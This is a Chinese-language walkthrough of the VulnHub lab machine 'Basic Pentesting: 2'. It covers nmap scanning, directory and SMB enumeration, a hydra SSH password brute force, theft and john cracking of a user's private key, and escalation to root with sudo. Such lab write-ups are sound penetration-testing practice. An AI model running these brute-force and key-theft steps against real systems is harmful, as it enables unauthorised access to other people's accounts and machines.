项目地址

```plain https://download.vulnhub.com/basicpentesting/basic_pentesting_2.tar.gz ```

修改静态ip

开机按e

输入rw signie init=/bin/bash

ctrl+x 进入编辑这个文件

vi /etc/network/interfaces

修改网卡为ens33

保存退出

实验过程

开启靶机虚拟机


使用nmap进行主机发现，获取靶机IP地址

```plain nmap 192.168.47.1-254 ```

根据对比可知Basic Pentesting: 2的一个ip地址为192.168.47.176

扫描Basic Pentesting: 2的操作系统，端口及对应服务

```plain nmap -A -p- 192.168.47.176 ```

发现该靶机开放了22，80，139，445，8009，8080端口

目录扫描

```plain dirb http://192.168.47.176 ```

信息收集

访问网站

拼接/development

存在两个文件，逐个点开看看

利用kali的enum4linux工具枚举SMB服务中的信息

enum4linux -a -o 192.168.47.176

成功的排列出两个用户名信息，也符合上述中交流的J和K

获取shell

我们已知账户名，而且又知道J用户存在弱密码问题，那就利用kali的九头蛇爆破

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://192.168.47.176 -t 64 

得到jan密码为armando

提权

ssh连接

ssh jan@192.168.47.176

登陆成功

查看可利用命令

sudo -l

没有权限

逐个查看可疑的文件 -> /home/kay/目录存在pass.bak文件，但无访问权限

但是可以访问kay用户的ssh私钥文件

cd .ssh
ls -al
cat id_rsa

复制私钥至本地，赋予执行权限

vi 1
chmod +x 1

通过python转换id_rsa为可以识别的信息，然后利用字典解密该信息，来获取文件密码

python /usr/share/john/ssh2john.py 1 > ssh_login
john --wordlist=/usr/share/wordlists/rockyou.txt ssh_login

获得密钥：beeswax

尝试登录ssh

ssh -i 1 kay@192.168.47.176

登录成功

查看可利用命令

sudo -l

密码不大行

有一个pass.bak文件，查看一下

这个可能是kay用户的密码，尝试使用命令sudo -l，输入密码成功

发现是ALL

直接sudo su提权

提权成功
好小子，离成功又近一步！！！